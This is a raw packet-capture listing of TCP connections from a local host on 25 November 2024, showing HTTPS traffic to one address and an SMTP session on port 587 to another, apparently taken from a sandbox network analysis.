Nov 25, 2024 14:47:41.383666039 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.383721113 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.402122021 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.402138948 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.402360916 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.402386904 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.402498007 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.413089991 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.413105965 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.413172960 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.413204908 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.413229942 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.413552999 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.423541069 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.423556089 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.423618078 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.423643112 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.423671961 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.424006939 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.433919907 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.433958054 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.434005022 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.434030056 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.434056044 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.435180902 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.530201912 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.530220032 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.530416965 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.530450106 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.530517101 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.534713030 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.534728050 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.534787893 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.534799099 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.534823895 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.534864902 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.539757013 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.539772034 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.540165901 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.540177107 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.540491104 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.545031071 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.545046091 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.545098066 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.545115948 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.545140028 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.545277119 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.549139977 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.549154997 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.549334049 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.549350977 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.549482107 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.554157972 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.554174900 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.554238081 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.554250002 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.554266930 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.554395914 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.558341980 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.558363914 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.558423996 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.558439016 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.558473110 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.558595896 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.562788963 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.562809944 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.562896013 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.562896013 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.562911987 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.563469887 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.722043991 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.722068071 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.722166061 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.722167015 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.722201109 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.722413063 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.725665092 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.725681067 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.725752115 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.725791931 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.725791931 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.725801945 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.725882053 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.730457067 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.730473995 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.730564117 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.730585098 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.730640888 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.734450102 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.734467030 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.734556913 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.734571934 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.734757900 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.739099026 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.739115953 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.739321947 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.739341021 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.739408970 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.743613005 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.743628979 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.743694067 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.743709087 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.743850946 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.747539043 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.747556925 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.747637033 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.747637033 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.747654915 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.749969959 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.751502037 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.751518965 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.751653910 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.751677990 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.751842022 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.913736105 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.913760900 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.913855076 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.913856030 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.913881063 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.914230108 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.918200016 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.918217897 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.918312073 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.918312073 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.918323994 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.918657064 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.922202110 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.922220945 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.922312021 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.922312021 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.922323942 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.922370911 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.926043987 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.926076889 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.926186085 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.926186085 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.926196098 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.926275015 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.930983067 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.931000948 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.931140900 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.931150913 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.931231976 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.935868979 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.935883045 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.936001062 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.936001062 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.936011076 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.936774015 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.939374924 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.939392090 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.939652920 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.939661980 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.939882994 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.944106102 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.944123983 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.944202900 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.944202900 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.944212914 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.944313049 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.105770111 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.105787992 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.105855942 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.105882883 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.105895996 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.105948925 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.110738039 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.110753059 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.110846043 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.110857010 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.112690926 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.114396095 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.114412069 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.114468098 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.114479065 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.114537001 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.119082928 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.119098902 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.119169950 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.119182110 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.119225979 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.119236946 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.123085976 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.123101950 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.123172998 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.123184919 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.123230934 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.124305964 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:42.127640963 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.127655983 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.127712011 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.127724886 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.127752066 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.127773046 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.131376982 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.131396055 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.131485939 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.131498098 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.133871078 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.136135101 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.136152983 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.136213064 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.136225939 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.137870073 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.244204998 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:42.245933056 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:42.312597990 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.312618971 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.312724113 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.312750101 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.313867092 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.316452980 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.316469908 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.316530943 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.316540956 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.317863941 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.320339918 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.320357084 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.320401907 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.320410967 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.320425987 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.320449114 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.325090885 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.325107098 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.325196981 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.325206995 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.325862885 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.329062939 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.329080105 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.329149961 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.329159975 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.329880953 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.333540916 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.333558083 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.333625078 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.333636045 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.333869934 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.336479902 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.336523056 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.336550951 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:42.336561918 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.336602926 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:42.387610912 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:43.534679890 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:43.534954071 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:43.654963970 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:44.193017960 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:44.194449902 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:44.320883989 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:44.320936918 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:44.326555967 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:44.609549999 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:44.609915972 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:44.729998112 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:45.047142982 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:45.047409058 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:45.167340040 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:45.450973988 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:45.452688932 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:45.572860003 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:45.865268946 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:45.865684986 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:45.985899925 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.266216040 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.266899109 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:46.266952991 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:46.266952991 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:46.269850016 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:46.387003899 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.387008905 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.387109995 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.389736891 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.782505989 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:47:46.828717947 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:47:49.785820961 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:49.785845041 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:49.789892912 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:49.810380936 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:49.810396910 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:51.084037066 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:51.084131002 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:51.116174936 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:51.116195917 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:51.116631031 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:51.156869888 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:51.341885090 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:51.383330107 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047278881 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047378063 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047409058 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047440052 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047465086 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047472954 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.047488928 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.047501087 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.047585964 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.047591925 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.055757999 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.056091070 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.056098938 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.070693970 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.072078943 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.072093010 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.125603914 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.167928934 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.219341040 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.219363928 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.255193949 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.255227089 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.255294085 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.255327940 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.255373001 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.260265112 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.268357992 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.268467903 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.268522024 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.268531084 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.268574953 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.276374102 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.284487963 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.288001060 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.288027048 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.292485952 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.292566061 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.292627096 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.292635918 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.292684078 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.300468922 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.308645010 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.308705091 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.308717966 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.315326929 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.315381050 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.315387011 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.321882963 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.321949005 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.321954966 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.335032940 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.335093975 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.335100889 CET	443	49747	172.67.129.178	192.168.2.4
